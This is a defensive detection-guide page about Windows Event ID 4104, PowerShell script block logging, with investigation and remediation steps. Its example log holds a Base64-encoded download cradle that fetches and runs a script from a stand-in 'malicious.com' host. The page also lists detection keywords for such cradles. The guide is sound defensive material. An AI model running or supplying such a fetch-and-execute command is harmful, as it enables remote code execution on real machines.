EventPeeker
Analyze EVTX Logs Free →·Detection guides
Event ID 4104T1059.001

Event ID 4104 — PowerShell Script Block Logging

Event ID 4104 captures the full content of PowerShell scripts as they execute, including de-obfuscated code. When script block logging is enabled, this event is invaluable for detecting PowerShell-based attacks — encoded commands, download cradles, and in-memory execution.

MITRE ATT&CK

Technique

T1059.001 · PowerShell

Tactic

Execution

View on attack.mitre.org →

Security Relevance

PowerShell is one of the most commonly abused tools in modern attacks because it is built into Windows, trusted by security controls, and capable of doing almost anything. Attackers use PowerShell to download payloads, execute shellcode in memory, dump credentials, and move laterally — often without writing files to disk. Script block logging captures this activity even when attackers use obfuscation.

Example Log Entry

Log Name: Microsoft-Windows-PowerShell/Operational
Source:    Microsoft-Windows-PowerShell
Event ID:  4104
Level:     Warning

Creating Scriptblock text (1 of 1):
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand
  aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5wczEn

ScriptBlock ID: {a1b2c3d4-e5f6-7890-abcd-ef1234567890}

Investigation Steps

  1. 1.Look for these keywords in script content: Invoke-Expression, IEX, DownloadString, DownloadFile, -EncodedCommand, FromBase64String, Invoke-WebRequest, Net.WebClient, -Bypass, -Hidden, -WindowStyle Hidden.
  2. 2.Decode any Base64-encoded commands — use CyberChef or PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...'))
  3. 3.Check the source — what process spawned PowerShell? Office applications, wscript.exe, or mshta.exe are red flags.
  4. 4.Look for network connections made by PowerShell at the same time (check firewall/proxy logs).
  5. 5.Check if the script executed in memory only (no file written to disk) — this is fileless malware.
  6. 6.Review the user context — was this a privileged account? Was the session interactive or remote?

Check your own logs for this technique — upload an EVTX file for instant detection, no account required.

Upload EVTX →See sample

Remediation

  • Enable PowerShell Constrained Language Mode via AppLocker or WDAC to limit what scripts can do.
  • Ensure script block logging is enabled via Group Policy: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell.
  • Enable PowerShell transcription logging for additional context.
  • Block PowerShell from being spawned by Office applications via Attack Surface Reduction rules.
  • Consider allowing only signed scripts via execution policy (though this alone is not a security control).
  • Investigate the full scope — PowerShell attacks are rarely isolated; look for lateral movement and persistence.

Related Event IDs

4103PowerShell module logging — logs all pipeline executions
4688Process created — see how PowerShell was launched and by what parent
4698Scheduled task created — PowerShell often used to install persistence
4624Successful logon — establish what session ran the script

Related Detection Guides

PowerShell AbuseLateral MovementRansomware IndicatorsLiving off the Land (LOLBins)

Analyze your Windows Event Logs

Upload an .evtx file from servers, domain controllers, or endpoints — get instant detections, MITRE mappings, and an AI-generated triage report.

Detect this technique in your logs →
← All detection guides·Analyze EVTX Logs Free →